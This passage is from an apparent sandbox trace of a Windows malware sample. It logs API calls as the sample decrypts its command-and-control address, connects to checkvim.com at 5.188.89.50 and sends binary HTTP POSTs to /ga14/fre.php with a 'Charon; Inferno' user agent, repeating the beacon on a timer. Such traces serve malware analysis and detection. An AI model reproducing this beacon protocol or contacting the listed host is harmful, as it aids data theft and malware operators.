(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0278.336] GetProcessHeap () returned 0x840000 [0278.336] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8712e0 [0278.336] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0278.336] GetProcessHeap () returned 0x840000 [0278.336] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8712e0 | out: hHeap=0x840000) returned 1 [0278.336] GetProcessHeap () returned 0x840000 [0278.336] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0278.336] GetProcessHeap () returned 0x840000 [0278.336] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0278.336] GetProcessHeap () returned 0x840000 [0278.336] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0278.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.337] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0278.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.342] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0278.347] GetProcessHeap () returned 0x840000 [0278.347] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0278.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.348] CryptImportKey (in: hProv=0x86f8a8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0278.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.349] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0278.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.350] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.350] GetProcessHeap () returned 0x840000 [0278.350] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0278.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.350] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0278.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.351] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0278.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.352] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0278.352] GetProcessHeap () returned 0x840000 [0278.352] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0278.353] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.353] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0278.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.354] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0278.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.355] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0278.355] GetProcessHeap () returned 0x840000 [0278.355] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0278.355] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0278.357] GetProcessHeap () returned 0x840000 [0278.357] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c48 [0278.357] socket (af=2, type=1, protocol=6) returned 0x434 [0278.357] connect (s=0x434, name=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0278.458] FreeAddrInfoW (pAddrInfo=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0278.458] GetProcessHeap () returned 0x840000 [0278.458] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0278.458] GetProcessHeap () returned 0x840000 [0278.458] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0278.459] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0278.460] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0278.460] GetProcessHeap () returned 0x840000 [0278.460] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0278.460] GetProcessHeap () returned 0x840000 [0278.460] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0278.460] GetProcessHeap () returned 0x840000 [0278.460] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0278.460] GetProcessHeap () returned 0x840000 [0278.460] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0278.461] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0278.461] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0278.461] GetProcessHeap () returned 0x840000 [0278.461] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0278.461] GetProcessHeap () returned 0x840000 [0278.461] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0278.461] send (s=0x434, buf=0x873a58*, len=237, flags=0) returned 237 [0278.462] send (s=0x434, buf=0x87eb58*, len=159, flags=0) returned 159 [0278.462] GetProcessHeap () returned 0x840000 [0278.462] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0278.462] recv (in: s=0x434, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0278.824] GetProcessHeap () returned 0x840000 [0278.824] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0278.824] GetProcessHeap () returned 0x840000 [0278.824] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0278.824] GetProcessHeap () returned 0x840000 [0278.824] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0278.824] GetProcessHeap () returned 0x840000 [0278.824] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0278.825] closesocket (s=0x434) returned 0 [0278.825] GetProcessHeap () returned 0x840000 [0278.825] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c48 | out: hHeap=0x840000) returned 1 [0278.825] GetProcessHeap () returned 0x840000 [0278.825] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0278.825] GetProcessHeap () returned 0x840000 [0278.825] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0278.825] GetProcessHeap () returned 0x840000 [0278.825] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0278.826] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x80c) returned 0x434 [0278.827] Sleep (dwMilliseconds=0xea60) [0278.844] GetProcessHeap () returned 0x840000 [0278.844] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0278.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.845] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0278.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.852] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0278.859] GetProcessHeap () returned 0x840000 [0278.860] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0278.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.861] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0278.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.862] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0278.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.867] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.867] GetProcessHeap () returned 0x840000 [0278.867] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0278.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.868] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0278.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.869] CryptDestroyKey (hKey=0x87e270) returned 1 [0278.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.870] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0278.870] GetProcessHeap () returned 0x840000 [0278.870] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0278.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.871] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0278.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.872] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0278.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.873] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0278.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.875] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0278.875] GetProcessHeap () returned 0x840000 [0278.875] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0278.875] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0278.875] GetProcessHeap () returned 0x840000 [0278.875] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0278.875] GetProcessHeap () returned 0x840000 [0278.875] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0278.875] GetProcessHeap () returned 0x840000 [0278.875] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0278.875] GetProcessHeap () returned 0x840000 [0278.876] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0278.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.877] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0278.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.883] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0278.920] GetProcessHeap () returned 0x840000 [0278.920] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0278.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.921] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0278.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.922] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0278.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.922] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.922] GetProcessHeap () returned 0x840000 [0278.922] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0278.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.924] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0278.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.924] CryptDestroyKey (hKey=0x87e270) returned 1 [0278.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.925] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0278.925] GetProcessHeap () returned 0x840000 [0278.925] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0278.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.926] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0278.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.927] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0278.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.928] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0278.928] GetProcessHeap () returned 0x840000 [0278.928] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0278.928] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8714e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0278.931] GetProcessHeap () returned 0x840000 [0278.931] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c58 [0278.931] socket (af=2, type=1, protocol=6) returned 0x438 [0278.931] connect (s=0x438, name=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0279.007] FreeAddrInfoW (pAddrInfo=0x8714e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0279.007] GetProcessHeap () returned 0x840000 [0279.007] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f710 [0279.007] GetProcessHeap () returned 0x840000 [0279.007] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0279.008] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0279.008] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0279.008] GetProcessHeap () returned 0x840000 [0279.008] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0279.008] GetProcessHeap () returned 0x840000 [0279.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0279.008] GetProcessHeap () returned 0x840000 [0279.008] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb90 [0279.009] GetProcessHeap () returned 0x840000 [0279.009] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0279.009] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0279.010] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0279.010] GetProcessHeap () returned 0x840000 [0279.010] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0279.010] GetProcessHeap () returned 0x840000 [0279.010] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0279.010] send (s=0x438, buf=0x873a58*, len=237, flags=0) returned 237 [0279.010] send (s=0x438, buf=0x87eb58*, len=159, flags=0) returned 159 [0279.010] GetProcessHeap () returned 0x840000 [0279.010] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0279.010] recv (in: s=0x438, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0279.392] GetProcessHeap () returned 0x840000 [0279.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0279.392] GetProcessHeap () returned 0x840000 [0279.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0279.392] GetProcessHeap () returned 0x840000 [0279.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0279.392] GetProcessHeap () returned 0x840000 [0279.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f710 | out: hHeap=0x840000) returned 1 [0279.392] closesocket (s=0x438) returned 0 [0279.393] GetProcessHeap () returned 0x840000 [0279.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c58 | out: hHeap=0x840000) returned 1 [0279.393] GetProcessHeap () returned 0x840000 [0279.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0279.393] GetProcessHeap () returned 0x840000 [0279.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0279.393] GetProcessHeap () returned 0x840000 [0279.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0279.393] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x810) returned 0x438 [0279.395] Sleep (dwMilliseconds=0xea60) [0279.396] GetProcessHeap () returned 0x840000 [0279.396] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0279.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.398] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0279.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.405] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0279.413] GetProcessHeap () returned 0x840000 [0279.413] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0279.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.415] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e530) returned 1 [0279.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.416] CryptSetKeyParam (hKey=0x87e530, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0279.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.417] CryptSetKeyParam (hKey=0x87e530, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.417] GetProcessHeap () returned 0x840000 [0279.417] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0279.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.419] CryptDecrypt (in: hKey=0x87e530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0279.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.420] CryptDestroyKey (hKey=0x87e530) returned 1 [0279.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.432] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0279.432] GetProcessHeap () returned 0x840000 [0279.432] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0279.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.434] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0279.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.435] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0279.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.435] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0279.436] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.436] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0279.436] GetProcessHeap () returned 0x840000 [0279.436] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0279.437] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0279.441] GetProcessHeap () returned 0x840000 [0279.441] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0279.441] GetProcessHeap () returned 0x840000 [0279.441] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0279.442] GetProcessHeap () returned 0x840000 [0279.442] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0279.442] GetProcessHeap () returned 0x840000 [0279.442] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0279.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.443] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0279.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0279.449] CryptAcquireContextW (in: phProv=0x19f950, 